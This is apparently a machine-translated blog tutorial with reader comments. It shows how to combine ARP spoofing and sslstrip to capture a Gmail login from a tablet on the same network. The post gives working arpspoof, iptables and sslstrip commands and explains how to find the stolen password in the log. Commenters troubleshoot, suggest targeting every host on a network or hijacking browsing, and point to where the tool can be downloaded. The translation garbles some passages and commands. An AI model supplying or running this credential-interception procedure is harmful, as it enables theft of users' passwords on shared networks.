क्रियेत कृती करणे व एसएसएलस्ट्रिप.

हॅलो ब्लॉगर

आपल्यासाठी बर्‍याच जणांना आवडत असलेल्यांच्या सुरक्षिततेशिवाय कोणत्याही नेटवर्कमध्ये जोडले जाणे किती धोकादायक आहे याचा एक छोटासा नमुना आज माझ्याकडे आहे.

आज मी जीमेल संकेतशब्द मिळवण्यासाठी एसएलस्ट्रिपसह अर्प्सस्पूफिंग वापरणार आहे. वातावरण अधिक नियंत्रित करण्यासाठी मी "" खाते तयार केले आहेtestarp@gmail.com".

आणि मला प्रस्तावना फारशी आवडत नाहीत, चला तर मग व्यवसायात जाऊया.

खालील माहितीसह ते काय करू शकतात यासाठी मी कधीही जबाबदार नाही. मी हे केवळ शैक्षणिक उद्देशाने करतो

पर्यावरण

या चाचणीसाठी आमच्याकडे जे आहे ते खालीलप्रमाणे आहे:

1. आक्रमणकर्ता: हा माझा डेस्कटॉप किंवा डेस्कटॉप संगणक आहे ज्यामध्ये डेबियन व्हेझी आहे. रिपॉझिटरीजमधून आपण स्थापित करू शकता sslstrip y डीएसनिफ असणे हार्पस्पूफिंग

२. पीडित: पीडित हा एक Android टॅब्लेट आहे जो फक्त ब्राउझरद्वारे त्याचे मेल पाहू इच्छित आहे.

The. माध्यम: मधला माझा आहे सिस्को डीपीसी 2425 राउटर

पत्ते

आक्रमणकर्त्याचा पत्ता: 172.26.0.2

राउटर पत्ता: 172.26.0.1

बळींचा पत्ता: 172.26.0.8

हल्ला:

हल्ला कसा कार्य करतो याबद्दल थोडेसे समजण्यासाठी, आपण माझ्या जुन्याकडे जाऊ शकता पोस्ट

या हल्ल्यासाठी आम्ही प्रथम करतो ती पुढे करणे म्हणजे आपला संगणक पीडित व्यक्तीकडे लक्ष न देता ती माहिती अग्रेषित करू शकेल. (अन्यथा हे सर्व्हिस हल्ला नाकारले जाईल)

त्यासाठी आम्ही वापरू:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

डायरेक्ट कन्सोल विंडोमधील प्रत्येक कमांड.

आता जर आपण tail -f केले desdelinux आम्ही माहिती थेट आणि थेट पाहतो

स्नॅपशॉट 1

तर मग आपल्याला पाहिजे ते कसे मिळेल?

प्रथम टॅब्लेटवर आमची मेल प्रविष्ट करू. लॉग इन करताना, आमच्या कन्सोलवर हजारो आणि हजारो गोष्टी दिसू लागल्या आहेत.

आता ते पूर्ण झाले की आपली फाईल उघडूया.desdelinux"नॅनो सह

nano desdelinux

कंट्रोल + डब्ल्यू सह आम्ही सेक्चर पोस्ट नावाची एखादी वस्तू शोधतो.

आणि आपण असे काहीतरी पाहू.

स्नॅपशॉट 2

पाहिले जाऊ शकत नाही की प्रचंड ओळ एक पीडित ईमेल आणि संकेतशब्द आहे.

अखेर बोगद्याच्या शेवटी प्रकाश न येईपर्यंत आम्ही उजवीकडे पळत असू.

स्नॅपशॉट 3

दुसर्‍या प्रसंगी आपण या हल्ल्यांपासून आपण स्वतःचे संरक्षण कसे करू शकतो हे पाहू.

कोट सह उत्तर द्या


आपली टिप्पणी द्या

आपला ई-मेल पत्ता प्रकाशित केला जाणार नाही. आवश्यक फील्ड चिन्हांकित केले आहेत *

*

*

  1. डेटा जबाबदार: मिगुएल Áन्गल गॅटन
  2. डेटाचा उद्देशः नियंत्रण स्पॅम, टिप्पणी व्यवस्थापन.
  3. कायदे: आपली संमती
  4. डेटा संप्रेषण: कायदेशीर बंधन वगळता डेटा तृतीय पक्षास कळविला जाणार नाही.
  5. डेटा संग्रहण: ओकेन्टस नेटवर्क (EU) द्वारा होस्ट केलेला डेटाबेस
  6. अधिकारः कोणत्याही वेळी आपण आपली माहिती मर्यादित, पुनर्प्राप्त आणि हटवू शकता.

  1.   LJlcmux म्हणाले

    मी ही संधी सांगत आहे की जेव्हा पोस्ट प्रकाशित होते तेव्हा आज्ञा योग्य नव्हत्या.

    शेवटी iptables कमांडमध्ये 8080 गहाळ आहे जी दुसर्‍या ओळीवर आहे. आणि मग आर्प्सपूफ कमांडस सर्व एकाच लाइनवर होती. प्रत्येक कमांड वेगळ्या ओळीवर असतो.

    आशा आहे की संपादक ते पहात असेल आणि त्याचे निराकरण करू शकेल.

    ग्रीटिंग्ज

    1.    मॅन्युअल डी ला फुएन्टे म्हणाले

      आपण उल्लेख केलेल्या दुरुस्त्या मी केल्या आहेत, ते ठीक आहे काय?

      आपण एखाद्या प्राधान्यीकृत एन्ट्रीमध्ये कोड टाकत असाल तर एचटीएमएल व्यूचा वापर करा आणि लेख प्रलंबित असताना पाठविण्यापूर्वी तो योग्य आहे की नाही हे सत्यापित करा. धन्यवाद.

  2.   लुइस म्हणाले

    हे जाणून घेणे खरोखरच आनंददायक आहे की आपल्यापैकी ज्यांना ज्ञान नाही ते इतके असुरक्षित आहेत. मला फार थोडासा विषय समजला तरीही मला त्याचे महत्त्व कळते. धन्यवाद!
    कोट सह उत्तर द्या

  3.   गिसकार्ड म्हणाले

    परंतु केवळ तेच कार्य करते जर हल्लेखोर आणि पीडित एकाच नेटवर्कवर असतील. कोणत्याही परिस्थितीत, मला असे वाटते की जर आपण (त्याच नेटवर्कवर असाल तर) HTTPS वापरून कनेक्ट केले जे घडत नाही कारण आपले मशीन सोडण्यापूर्वी डेटा कूटबद्ध केलेला आहे. आपण एचटीटीपी (एसशिवाय) कनेक्ट केल्यास मला असे वाटते की नेटवर्क केबल पहात असताना देखील आपल्याला कळा दिसतात.

    1.    LJlcmux म्हणाले

      हे खरे नाही. मी जीमेल संकेतशब्द हॅक करीत आहे आणि जर तुम्हाला लक्षात आले की जीमेल https वापरत आहे. तर? मुद्दा असा आहे की https सुरक्षित असले तरी ते http वर अवलंबून आहेत. म्हणून ते इतके सुरक्षित नाही.

      एखाद्या https बद्दल इतके कबूल करू नका की एस सुपरमॅनसाठी नाही, ते "सुरक्षित" आहे

    2.    आरटीन म्हणाले

      ते https सह किंवा त्याशिवाय कार्य करते, मी अधिक विशिष्ट लिनक्स डिस्ट्रोसह हे वापरून पाहिले आहे आणि हे अडचणीशिवाय कार्य करते

    3.    मॅन्युअल डी ला फुएन्टे म्हणाले

      आपला Wi-Fi चोरणा .्यांना धडा शिकवण्यासाठी आपण याचा वापर तंतोतंत करू शकता. 😀

      चिया अलोन्सोच्या ब्लॉगवर त्यांनी बर्‍याच काळापूर्वी सांगितल्याप्रमाणे हे कमी-अधिक प्रमाणात आहे:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    रेयॉनंट म्हणाले

        ओस्टिया, हे काय करते ते छान आहे! / आणि मग जेव्हा ते बँक खाते तपासण्यासाठी जातात तेव्हा जेव्हा मी व्हीपीएन वापरतो तेव्हा ते माझ्या वेडेपणाला सांगतात ...). तसे, आपल्याला पहावे लागेल की निंदनीय लोक टिप्पण्यांमध्ये कसे आहेत ... शेवटी जर ते चोरी करीत असेल तर ...

        1.    इलियोटाइम 3000 म्हणाले

          आता आपल्याला आपली स्वतःची व्हीपीएन सेवा कशी तयार करावी आणि ऑफर कशी करावी यासाठी एक ट्यूटोरियल घेण्याची आवश्यकता आहे.

      2.    डॅनियल म्हणाले

        आपण जोडलेली कहाणी ही अत्यंत रंजक आहे, ती अगदी कादंबरीच्या पुस्तकासाठी देखील योग्य आहे आणि हे मला आठवते जेव्हा मी माझ्या शेजार्‍यांचे इंटरनेट वापरत असेन आणि मला असे म्हणतात की मला हा विषय माहित आहे, परंतु मला वाटते की मला होणार्‍या धोक्याचे खरे परिमाण मला कधीही दिसले नाही शेवटी, सुदैवाने माझ्यासाठी, त्यांनी केवळ संकेतशब्द डब्ल्यूपीए 2 वर बदलला आणि तिथेच आयएसपी बरोबर माझी कथा हाहा

    4.    Mauricio म्हणाले

      म्हणूनच शीर्षक कृतीत स्लस्ट्रिप म्हणतो.

      जोपर्यंत हल्लेखोर मध्यभागी आहे तोपर्यंत हे कार्य करते

  4.   अनामिक म्हणाले

    प्रिझममध्ये आपण कोणती लाट काम करता? -.-
    नाही.
    आपली विनंती एक्सडी पाठविण्यासाठी आपण काय पहात आहात?
    शुभेच्छा
    चांगली पोस्ट

  5.   ऑरोसझेडएक्स म्हणाले

    मजेशीर म्हणजे मी नंतर शैक्षणिक चाचणी करीन ... कदाचित मी वायफायचा संकेतशब्द देखील काढू शकलो असतो आणि थोडासा मजा करू शकतो 😛
    कोणत्याही संधीनुसार, लक्ष्यित विनंती केलेल्या पृष्ठांवर भिन्न पृष्ठे पाठविण्यासाठी आपण असेच काही करू शकता? उदाहरणार्थ, त्यांना फेसबुक उघडायचे आहेत आणि मी त्यांना Google वर पुनर्निर्देशित करतो? 😛

    1.    LJlcmux म्हणाले

      होय पण हे सर्व अगदी भिन्न रोल आहे.

      कदाचित मी नंतर पोस्ट करेन.

  6.   शेवटची नववी म्हणाले

    खूप चांगले पोस्ट, हे विषय खूपच शैक्षणिक आहेत, आता आम्हाला या हल्ल्याचा प्रतिकार करण्यास सक्षम होण्याची आवश्यकता आहे, कारण काही (माझ्यासारख्या) सार्वजनिक नेटवर्कशी (उदाहरणार्थ विद्यापीठ) ते कनेक्ट करणे उपयुक्त ठरेल.

    धन्यवाद!

  7.   फक्त-दुसरा-डीएल-वापरकर्ता म्हणाले

    हे माझ्यासाठी कार्य करत नाही 🙁

  8.   व्हेकर म्हणाले

    येथे मला अयशस्वी करते, याशिवाय https कनेक्शन सर्व्हर प्रमाणपत्रद्वारे एन्क्रिप्ट केले गेले आहेत (एकदा आपल्या संगणकावर प्रमाणपत्र असल्यास, आपला ब्राउझर एन्क्रिप्शनचा प्रभारी आहे) iptables सह आपण पोर्ट 80 (HTTP) पुनर्निर्देशित करता , 443 नाही, जे https आहे

    1.    LJlcmux म्हणाले

      मलाही असं वाटलं. मुद्दा असा आहे की https जरी "सुरक्षित" असली तरी ती दुर्दैवाने http वर अवलंबून असते. तर sslstrip त्याचा फायदा घेतो, यामुळे ब्राउझरला असा विश्वास वाटतो की ते https क्रेडेन्शियल्स वापरत आहेत परंतु तसे नाही.

      1.    व्हेकर म्हणाले

        पवित्र छंद! परंतु ब्राउझरला असा चेतावणी दिसला पाहिजे की "हे प्रमाणपत्र एखाद्या संशयास्पद साइटवरून आले आहे किंवा तसे काहीतरी" ... मला नक्कीच एक्सडी चाचणी घ्याव्या लागतील

        1.    LJlcmux म्हणाले

          नाही, पूर्णपणे काहीही बाहेर येत नाही.

  9.   फक्त-दुसरा-डीएल-वापरकर्ता म्हणाले

    हे शेवटी माझ्यासाठी काम केले
    मी संकेतशब्दासह डब्ल्यूईपी नेटवर्कवर कनेक्ट केलेला आहे आणि तरीही त्याने मला संकेतशब्द थेट दर्शविला आहे.

    एक क्वेरी आपण एकच प्रक्रिया करण्याऐवजी नेटवर्कशी कनेक्ट असलेल्या सर्व संगणकांसाठी ही प्रक्रिया करू शकता?

    1.    LJlcmux म्हणाले

      होय आपण हे करू शकता. पण मी प्रयोग केलेले नाहीत. स्वत: करून पहा आणि आपण कसे करीत आहात ते आम्हाला सांगा.

  10.   सिनिक १. म्हणाले

    मला फक्त या गोष्टी मिळतात की पीडितेचे मशीन ऑफलाइन होते, परंतु sslstrip मला काहीही दर्शवित नाही: /

    1.    LJlcmux म्हणाले

      आपल्याला एका क्षणासाठी फायरवॉल अक्षम करण्याची आवश्यकता आहे. किंवा किमान येणारे कनेक्शन सक्षम करा.

  11.   श्री ब्लॅक म्हणाले

    शोध आणि मी फक्त फेसबुक पृष्ठाचे वापरकर्तानाव आणि संकेतशब्द पाहू शकलो, जीमेलमध्ये लॉगमध्ये कोणतेही परिणाम आढळले नाहीत, तसेच मला फक्त अर्प्सपूफची एक ओळ आवश्यक आहे «arpspoof -i -t«. दुसरीकडे, पीडित मशीन काही पृष्ठे उघडू शकली नाही. मी तपास करतच राहिल, हे खूपच मनोरंजक आहे. ज्यांना मंजारो वापरतात त्यांच्यासाठी मदत, स्थापित करण्यासाठीची पॅकेजेस अशी आहेत: डीएसनिफ (येथे आर्प्सपॉफ आहे), ट्विस्टेड आणि पायथॉन 2-पायपेंस्ल. Sslstrip येथून डाउनलोड केले जाऊ शकते: http://www.thoughtcrime.org/software/sslstrip/
    ते चालविण्यासाठी $ पायथन 2 sslstrip.py
    ग्रीटिंग्ज

  12.   श्री ब्लॅक म्हणाले

    ते बाहेर आले नाही परंतु आर्प्सपूफ लाइन आहे: #arpspoof -i इंट -t ip-قرباني आयपी-राउटर

  13.   गिल्बर्ट म्हणाले

    पाहा तुम्ही जे बोलता तेच मी करतो:

    प्रतिध्वनी "1"> / proc / sys / नेट / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp estडिस्टिनेशन-पोर्ट 80 -j रेडरेक्ट-टू-पोर्ट्स 8080

    आर्प्सपूफ -i एथ0 -t 172.26.0.8 172.26.0.1
    आर्प्सपूफ -i एथ0 -t 172.26.0.1 172.26.0.2

    अडचण अशी आहे की पीडित व्यक्ती, जो माझ्या खोलीत येथे आहे तो आणखी एक पीसी आहे, मला राउटर रीस्टार्ट करावा लागेल या बिंदूशी कोणताही संबंध न ठेवता सोडले गेले आहे, मी काय करू शकतो, मला मदत करा.

    दुसरी गोष्ट, मी व्हर्च्युअल मशीनसह काम करीत आहे, आणि जेव्हा मी iwconfig कमांड कार्यान्वित करतो तेव्हा wlan0 दिसत नाही, किंवा जेव्हा मी ifconfig कार्यान्वित करते, तथापि, माझ्याकडे माझ्या व्हर्च्युअल मशीनवर इंटरनेट असल्यास, एथ 0 इंटरफेससह काय आहे.